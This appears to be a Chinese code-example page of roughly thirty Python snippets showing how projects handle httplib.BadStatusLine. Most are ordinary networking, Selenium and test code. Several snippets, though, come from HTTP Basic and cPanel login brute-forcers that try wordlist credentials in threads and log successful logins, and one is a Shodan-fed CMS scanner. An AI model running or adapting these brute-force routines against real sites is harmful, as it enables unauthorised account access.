我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用httplib.BadStatusLine()。
def request(self, host, handler, request_body, verbose=0): #retry request once if cached connection has gone cold for i in (0, 1): try: return self.single_request(host, handler, request_body, verbose) except socket.error, e: if i or e.errno not in (errno.ECONNRESET, errno.ECONNABORTED, errno.EPIPE): raise except httplib.BadStatusLine: #close after we sent request if i: raise ## # Send a complete request, and parse the response. # # @param host Target host. # @param handler Target PRC handler. # @param request_body XML-RPC request body. # @param verbose Debugging flag. # @return Parsed response.
def run(self): username, password = getword() try: print "-"*12 print "User:",username,"Password:",password req = urllib2.Request(sys.argv[1]) passman = urllib2.HTTPPasswordMgrWithDefaultRealm() passman.add_password(None, sys.argv[1], username, password) authhandler = urllib2.HTTPBasicAuthHandler(passman) opener = urllib2.build_opener(authhandler) fd = opener.open(req) print "\t\n\nUsername:",username,"Password:",password,"----- Login successful!!!\n\n" print "Retrieved", fd.geturl() info = fd.info() for key, value in info.items(): print "%s = %s" % (key, value) sys.exit(2) except (urllib2.HTTPError, httplib.BadStatusLine,socket.error), msg: print "An error occurred:", msg pass
def get_target(): global client, db cursor = db.Shodita.find({"bot":"Shizuka"}) for document in cursor: if check_domain_mongodb(document["ip"], document["dominio"]): print colores.verde + "[INFO] Domain: " + document["dominio"] + " already scanned" + colores.normal pass else: url = "http://" + document["dominio"] headers = {'User-Agent' : 'Mozilla 5.10'} request = Request(url, None, headers) try: response = urlopen(request, timeout=10) if response.code == 200 or response.code == "OK": html = response.read() if detect_wp(html, document["dominio"]) == True: insert_mongodb("WordPress", document["dominio"], document["ip"]) print colores.verde + "[+][INFO] " + document["dominio"] + " is WordPress" + colores.normal if detect_joomla(html): insert_mongodb("Joomla", document["dominio"], document["ip"]) print colores.verde + "[+][INFO] " + document["dominio"] + " is Joomla" + colores.normal if detect_drupal(html): insert_mongodb("Drupal", document["dominio"], document["ip"]) print colores.verde + "[+][INFO] " + document["dominio"] + " is Drupal" + colores.normal except URLError, e: continue except httplib.BadStatusLine: continue except: continue
def quit(self): """Quits the driver and close every associated window.""" try: RemoteWebDriver.quit(self) except (http_client.BadStatusLine, socket.error): # Happens if Firefox shutsdown before we've read the response from # the socket. pass if "specificationLevel" in self.capabilities: self.service.stop() else: self.binary.kill() try: shutil.rmtree(self.profile.path) if self.profile.tempfolder is not None: shutil.rmtree(self.profile.tempfolder) except Exception as e: print(str(e))
def create_tcp_connection(self, hostname, port, timeout, **kwargs): sock = socket.create_connection((self.proxy_host, int(self.proxy_port))) if hostname.endswith('.appspot.com'): hostname = 'www.google.com' request_data = 'CONNECT %s:%s HTTP/1.1\r\n' % (hostname, port) if self.proxy_username and self.proxy_password: request_data += 'Proxy-Authorization: Basic %s\r\n' % base64.b64encode(('%s:%s' % (self.proxy_username, self.proxy_password)).encode()).decode().strip() request_data += '\r\n' sock.sendall(request_data) response = httplib.HTTPResponse(sock) response.fp.close() response.fp = sock.makefile('rb', 0) response.begin() if response.status >= 400: raise httplib.BadStatusLine('%s %s %s' % (response.version, response.status, response.reason)) return sock
def quit(self): """Quits the driver and close every associated window.""" try: RemoteWebDriver.quit(self) except (http_client.BadStatusLine, socket.error): # Happens if Firefox shutsdown before we've read the response from # the socket. pass if self.w3c: self.service.stop() else: self.binary.kill() if self.profile is not None: try: shutil.rmtree(self.profile.path) if self.profile.tempfolder is not None: shutil.rmtree(self.profile.tempfolder) except Exception as e: print(str(e))
def ssl_checker(self, domain): domain_fix = "https://{}".format(domain) try: # Skip SSL Verification Check! # https://stackoverflow.com/questions/27835619/ssl-certificate-verify-failed-error gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1) # Only for gangstars data = urllib2.urlopen("https://{}".format(domain), timeout=25, context=gcontext) if "ERROR" in data or "Errno" in data: domain_fix = "http://{}".format(domain) except urllib2.HTTPError, e: pass except urllib2.URLError, e: domain_fix = "http://{}".format(domain) except ssl.SSLError as e: domain_fix = "http://{}".format(domain) except httplib.BadStatusLine: domain_fix = "http://{}".format(domain) return domain_fix
def URL_to_HTML(URL): try: HTML = urllib2.urlopen(URL) except urllib2.HTTPError as error: print u'HTTPError: {0} ({1})'.format(URL, error.code) except urllib2.URLError as error: print u'URLError: {0} ({1})'.format(URL, error.reason) except httplib.BadStatusLine as error: print u'BadStatusLine: {}'.format(URL) except SocketError as error: if error.errno != errno.ECONNRESET: raise pass else: Charset = HTML.headers['content-type'][HTML.headers['content-type'].index('=') + 1:] HTML = unicode(HTML.read(), Charset) return HTML
def test_status_lines(self): # Test HTTP status lines body = "HTTP/1.1 200 Ok\r\n\r\nText" sock = FakeSocket(body) resp = httplib.HTTPResponse(sock) resp.begin() self.assertEqual(resp.read(0), '') # Issue #20007 self.assertFalse(resp.isclosed()) self.assertEqual(resp.read(), 'Text') self.assertTrue(resp.isclosed()) body = "HTTP/1.1 400.100 Not Ok\r\n\r\nText" sock = FakeSocket(body) resp = httplib.HTTPResponse(sock) self.assertRaises(httplib.BadStatusLine, resp.begin)
def pcl_put(options, source, target): """ ?????????? ?????????? ??????? ???????? ????? ? ????????? (pcl_put_retry) """ pcl_verbose("Transfer: {0} ({1}) -> {2}".format(source, pcl_human(os.path.getsize(source)), target), options.verbose) retry = 0 while True: try: pcl_put_retry(options, source, target) break except (pclURLError, pclBadStatusLine, pclCannotSendRequest, ssl.SSLError, socket.error, pclError) as e: pcl_can_query_retry(e) retry += 1 pcl_debug("Retry {0}/{1}: {2}".format(retry, options.retries, e), options.debug) if retry >= options.retries: raise pclError(1, e) time.sleep(options.delay)
def pcl_get(options, source, target): """ ?????????? ?????????? ??????? ????????? ????? ?? ????????? (pcl_get_retry) """ pcl_verbose("Transfer: {0} -> {1}".format(source, target), options.verbose) retry = 0 while True: try: pcl_get_retry(options, source, target) break except (pclURLError, pclBadStatusLine, pclCannotSendRequest, ssl.SSLError, socket.error, pclError) as e: pcl_can_query_retry(e) retry += 1 pcl_debug("Retry {0}/{1}: {2}".format(retry, options.retries, e), options.debug) if retry >= options.retries: raise pclError(1, e) time.sleep(options.delay)
def _request(self, method, path, postdata): ''' Do a HTTP request, with retry if we get disconnected (e.g. due to a timeout). This is a workaround for https://bugs.python.org/issue3566 which is fixed in Python 3.5. ''' headers = {'Host': self.__url.hostname, 'User-Agent': USER_AGENT, 'Authorization': self.__auth_header, 'Content-type': 'application/json'} try: self.__conn.request(method, path, postdata, headers) return self._get_response() except httplib.BadStatusLine as e: if e.line == "''": # if connection was closed, try again self.__conn.close() self.__conn.request(method, path, postdata, headers) return self._get_response() else: raise
def processTarget(self, t, port): if not self.seentarget(t + str(port)): self.addseentarget(t + str(port)) self.display.verbose(self.shortName + " - Connecting to " + t) try: conn = httplib.HTTPConnection(t, port, timeout=10) conn.request('GET', '/') response = conn.getresponse() serverver = response.getheader('server') if (serverver): outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + str( port) + "_" + Utils.getRandStr(10) Utils.writeFile("Identified Server Version of %s : %s\n\nFull Headers:\n%s" % ( t, serverver, self.print_dict(response.getheaders())), outfile) kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F")) except httplib.BadStatusLine: pass # except socket.error as e: except: pass
def test_handle_script_request_unexpected_instance_exception(self): self.servr._instance_factory.new_instance( mox.IgnoreArg(), expect_ready_request=False).AndReturn(self.inst) self.inst.start() self.inst.handle( self.environ, self.start_response, self.url_map, self.match, self.request_id, instance.INTERACTIVE_REQUEST).AndRaise(httplib.BadStatusLine('line')) self.mox.ReplayAll() self.assertRaises( httplib.BadStatusLine, self.servr._handle_script_request, self.environ, self.start_response, self.url_map, self.match, self.request_id) self.mox.VerifyAll()
def fetchsamples(limit): ret = [] url = "https://stream.twitter.com/1/statuses/sample.json" parameters = [] while len(ret) < limit: try: response = twitterreq(url, "GET", parameters) for line in response: ret.append(line.strip()) if len(ret) % 100 == 0: print len(ret) if len(ret) >= limit: break except IncompleteRead: pass except BadStatusLine: pass return ret # filter tweets for images / good captions and output them to file
def request(self, url, query, headers, timeout): request = Request(url, query.encode('utf-8'), headers) try: if (sys.version_info[0] == 2 and sys.version_info[1] > 5) or sys.version_info[0] > 2: response = self.http_opener.open(request, timeout=timeout) else: response = self.http_opener.open(request) except HTTPError as error: if error.fp is None: raise HTTPHandlerError(error.filename, error.code, error.msg, dict(error.hdrs)) else: raise HTTPHandlerError(error.filename, error.code, error.msg, dict(error.hdrs), error.read()) except URLError as error: # urllib2.URLError documentation is horrendous! # Try to get the tuple arguments of URLError if hasattr(error.reason, 'args') and isinstance(error.reason.args, tuple) and len(error.reason.args) == 2: raise HTTPHandlerError(httpcode=error.reason.args[0], httpmsg=error.reason.args[1]) else: raise HTTPHandlerError(httpmsg='urllib2.URLError: %s' % (error.reason)) except BadStatusLine as error: raise HTTPHandlerError(httpmsg='httplib.BadStatusLine: %s' % (error.line)) return response.read().decode('utf-8')
def _post(self, url, body, headers): _headers = self.auth_headers.copy() _headers.update(headers) attempts = self.max_retries + 1 while attempts > 0: try: self.conn.request('POST', url, body.encode('UTF-8'), _headers) return check_response_status(self.conn.getresponse()) except (socket.error, httplib.ImproperConnectionState, httplib.BadStatusLine): # We include BadStatusLine as they are spurious # and may randomly happen on an otherwise fine # Solr connection (though not often) self._reconnect() attempts -= 1 if attempts <= 0: raise
def __wait_for_disappearing(cls): t = 0 while t < 120: t = t + 1 try: elements = env.threadlocal.BROWSER.find_elements(cls.by, cls.value) except NoSuchElementException: log.step_normal("Element [%s]: NoSuchElementException." % cls.__name__) elements = [] except BadStatusLine: log.step_warning("Element [%s]: BadStatusLine." % cls.__name__) continue except UnexpectedAlertPresentException: log.step_warning("Element [%s]: UnexpectedAlertPresentException." % cls.__name__) if len(elements) == 0: return True else: time.sleep(0.5) log.step_normal("Element [%s]: WairForDisappearing... Found [%s] Element. Tried [%s] Times." % (cls.__name__, len(elements), t)) return False
def make_request(self, request): """ makes a request and returns an object with the result """ res = {} res['type'] = 'unknown' try: response = self.opener.open(request) except urllib2.HTTPError as error: res['content'] = error.read() res['cookie'] = '' res['succeed'] = False except urllib2.URLError as error: res['content'] = str(error) res['cookie'] = '' res['succeed'] = False except httplib.BadStatusLine as error: res['content'] = str(error) res['cookie'] = '' res['succeed'] = False else: res = Session.transform_content_to_response(response) return res
def geturls(url): try: print "[+] Collecting:",url page = urllib2.urlopen(url).read() links = re.findall(('http://\w+.\w+\.\w+[/\w+.]*[/.]\w+'), page) for link in links: if link not in urls and link[-3:].lower() not in ("gif","jpg","png","ico"): urls.append(link) except(IOError,TypeError,AttributeError,httplib.BadStatusLine,socket.error): pass return urls
def getauth(site): print "[-] Checking Authentication:",site global hits try: req = urllib2.Request(site) handle = urllib2.urlopen(req) if site in urls: print "Removing:",site urls.remove(site) except(IOError,urllib2.URLError,urllib2.HTTPError,httplib.BadStatusLine,socket.error), msg: print "\t- Got:",msg,"\n" try: if hasattr(msg, 'code') or msg.code == 401: authline = msg.headers.get('www-authenticate', '') if authline: print "[+]",authline print "[+] Found site using basic authentication" print "[+] Attempting Brute Force on",site,"\n" hits +=1 for i in range(len(words)*len(users)): work = threading.Thread() work.setDaemon(1) work.start() threader(site) time.sleep(1) except(AttributeError): pass else: print "\t- Got: 200\n"
def threader(site): username, password = getword() global logins try: print "-"*12 print "User:",username,"Password:",password req = urllib2.Request(site) passman = urllib2.HTTPPasswordMgrWithDefaultRealm() passman.add_password(None, site, username, password) authhandler = urllib2.HTTPBasicAuthHandler(passman) opener = urllib2.build_opener(authhandler) fd = opener.open(req) site = urllib2.urlopen(fd.geturl()).read() print "\n[+] Checking the authenticity of the login...\n" if not re.search(('denied'), site.lower()): print "\t\n\n[+] Username:",username,"Password:",password,"----- Login successful!!!\n\n" print "[+] Writing Successful Login:",sys.argv[5],"\n" logins +=1 file = open(sys.argv[5], "a") file.writelines("Site: "+site+" Username: "+username+ " Password: "+password+"\n") file.close() print "Retrieved", fd.geturl() info = fd.info() for key, value in info.items(): print "%s = %s" % (key, value) else: print "- Redirection" except (urllib2.HTTPError, httplib.BadStatusLine,socket.error), msg: print "An error occurred:", msg pass
def run(self): username, password = getword() try: print "-"*12 print "User:",username,"Password:",password auth_handler = urllib2.HTTPBasicAuthHandler() auth_handler.add_password("cPanel", server, base64encodestring(username)[:-1], base64encodestring(password)[:-1]) opener = urllib2.build_opener(auth_handler) urllib2.install_opener(opener) urllib2.urlopen(server) print "\t\n\nUsername:",username,"Password:",password,"----- Login successful!!!\n\n" except (urllib2.HTTPError, httplib.BadStatusLine), msg: #print "An error occurred:", msg pass
def getauth(site, users): print "[-] Checking Authentication:",site global hits try: req = urllib2.Request(site) handle = urllib2.urlopen(req) if site in urls: print "Removing:",site urls.remove(site) except(IOError,urllib2.URLError,urllib2.HTTPError,httplib.BadStatusLine,socket.error), msg: print "\t- Got:",msg,"\n" try: if hasattr(msg, 'code') or msg.code == 401: authline = msg.headers.get('www-authenticate', '') if authline: print "[+]",authline print "[+] Found site using basic authentication" domain = site[7:].split("/",3)[0] print "[+] Collecting users from Google:",domain,"\n" getusers(domain) print "[+] Attempting Brute Force on",site,"\n" hits +=1 for i in range(len(words)*len(users)): work = threading.Thread() work.setDaemon(1) work.start() threader(site) time.sleep(1) print len(users) print "[+] Removing last collected users\n" users = users[:-int(erase)] print len(users) except(AttributeError): pass else: print "\t- Got: 200\n"
def threader(site): username, password = getword() global logins try: print "-"*12 print "User:",username,"Password:",password req = urllib2.Request(site) passman = urllib2.HTTPPasswordMgrWithDefaultRealm() passman.add_password(None, site, username, password) authhandler = urllib2.HTTPBasicAuthHandler(passman) opener = urllib2.build_opener(authhandler) fd = opener.open(req) site = urllib2.urlopen(fd.geturl()).read() print "\n[+] Checking the authenticity of the login...\n" if not re.search(('denied'), site.lower()): print "\t\n\n[+] Username:",username,"Password:",password,"----- Login successful!!!\n\n" print "[+] Writing Successful Login:",sys.argv[5],"\n" logins +=1 file = open(sys.argv[5], "a") file.writelines("Site: "+site+" Username: "+username+ " Password: "+password+"\n") file.close() print "Retrieved", fd.geturl() info = fd.info() for key, value in info.items(): print "%s = %s" % (key, value) else: print "- Redirection\n" except (urllib2.HTTPError,httplib.BadStatusLine,socket.error), msg: print "An error occurred:", msg pass
def getresponse(self): _MyHTTPBadStatusConnection.num_calls += 1 raise httplib.BadStatusLine("")
def testBadStatusLineRetry(self): old_retries = httplib2.RETRIES httplib2.RETRIES = 1 self.http.force_exception_to_status_code = False try: response, content = self.http.request("http://bitworking.org", connection_type=_MyHTTPBadStatusConnection) except httplib.BadStatusLine: self.assertEqual(2, _MyHTTPBadStatusConnection.num_calls) httplib2.RETRIES = old_retries
def quit(self): """ Closes the browser and shuts down the SafariDriver executable that is started when starting the SafariDriver """ try: RemoteWebDriver.quit(self) except http_client.BadStatusLine: pass finally: self.service.stop()
def request(self, host, handler, request_body, verbose=0): """Send XMLRPC request""" uri = '{scheme}://{host}{handler}'.format(scheme=self._scheme, host=host, handler=handler) if self._passmgr: self._passmgr.add_password(None, uri, self._username, self._password) if self.verbose: _LOGGER.debug("FabricTransport: {0}".format(uri)) opener = urllib2.build_opener(*self._handlers) headers = { 'Content-Type': 'text/xml', 'User-Agent': self.user_agent, } req = urllib2.Request(uri, request_body, headers=headers) try: return self.parse_response(opener.open(req)) except (urllib2.URLError, urllib2.HTTPError) as exc: try: code = -1 if exc.code == 400: reason = 'Permission denied' code = exc.code else: reason = exc.reason msg = "{reason} ({code})".format(reason=reason, code=code) except AttributeError: if 'SSL' in str(exc): msg = "SSL error" else: msg = str(exc) raise InterfaceError("Connection with Fabric failed: " + msg) except BadStatusLine: raise InterfaceError("Connection with Fabric failed: check SSL")
def provision_eos(port, username, password): connection = pyeapi.client.connect( transport='https', host='localhost', username='vagrant', password='vagrant', port=port ) device = pyeapi.client.Node(connection) commands = list() commands.append('configure session') commands.append('rollback clean-config') with open('../eos/initial.conf', 'r') as f: lines = f.readlines() for line in lines: line = line.strip() if line == '': continue if line.startswith('!'): continue commands.append(line) commands[-1] = 'commit' try: device.run_commands(commands) except httplib.BadStatusLine: # This actually means everything went fine print_info_message()
def fetch(self, method, host, path, headers, payload, bufsize=8192, timeout=20): request_data = '%s %s HTTP/1.1\r\n' % (method, path) request_data += ''.join('%s: %s\r\n' % (k, v) for k, v in headers.items()) request_data += '\r\n' #print("request:%s" % request_data) #print("payload:%s" % payload) conn = self.get_conn() if not conn: logging.warn("get sock fail") return if len(request_data) + len(payload) < 1300: payload = request_data.encode() + payload else: conn.sock.send(request_data.encode()) payload_len = len(payload) start = 0 while start < payload_len: send_size = min(payload_len - start, 65535) sended = conn.sock.send(payload[start:start+send_size]) start += sended conn.sock.settimeout(timeout) response = httplib.HTTPResponse(conn.sock, buffering=True) response.conn = conn try: #orig_timeout = conn.sock.gettimeout() #conn.sock.settimeout(timeout) response.begin() #conn.sock.settimeout(orig_timeout) except httplib.BadStatusLine as e: logging.warn("fetch bad status line:%r", e) response = None except Exception as e: logging.warn("fetch:%r", e) return response